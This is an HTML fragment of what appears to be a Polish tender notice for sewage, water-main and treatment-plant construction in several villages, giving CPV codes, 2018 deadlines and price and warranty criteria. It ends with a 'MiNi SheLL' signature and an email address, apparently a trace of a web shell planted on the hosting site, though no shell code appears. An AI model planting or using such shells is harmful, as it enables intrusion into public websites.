Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, f) Etap Nr 6  roboty budowlane dot. budowy oczyszczalni ścieków oraz budowy infrastruktury towarzyszącej w miejscowości Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45232421-9, 45232423-3,
                    45231300-8,
                    45236000-0,
                    45233226-9,
                    45310000-3,
                    45111200-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie Nr 3  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowościach Dobrzęcino i Słonowice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie Nr 3  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowościach Dobrzęcino i Słonowice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, w tym: a) Etap Nr 1  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków w miejscowości Dobrzęcino wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, b) Etap Nr 2  roboty budowlane dot. budowy sieci wodociągowej wraz z sięgaczami w miejscowości Dobrzęcino wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, c) Etap Nr 3  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków w miejscowości Słonowice wraz 
z wykonaniem inwentaryzacji geodezyjnej powykonawczej, d) Etap Nr 4  roboty budowlane dot. budowy sieci wodociągowej wraz z sięgaczami w miejscowości Słonowice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, e) Etap Nr 5  roboty budowlane dot. budowy przyłączy wodociągowych wraz z podłączeniem budynków w miejscowości Dobrzęcino wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, f) Etap Nr 6  roboty budowlane dot. budowy przyłączy wodociągowych wraz z podłączeniem budynków w miejscowości Słonowice wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45231300-8, 45111000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/05/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie Nr 5  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie Nr 5  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków oraz przebudowy urządzeń wodociągowych w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, w tym: a) Etap Nr 1  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, b) Etap Nr 2  roboty budowlane dot. budowy sieci wodociągowej wraz z sięgaczami w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej, c) Etap Nr 3  roboty budowlane dot. budowy przyłączy wodociągowych wraz z podłączeniem budynków w miejscowości Płaszewo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45231300-8, 45111000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie Nr 6  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków w miejscowości Zębowo wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie Nr 6  roboty budowlane dot. budowy lokalnego systemu zbierania ścieków w miejscowości Zębowo wraz 
z wykonaniem inwentaryzacji geodezyjnej powykonawczej 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45231300-8, 45111000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com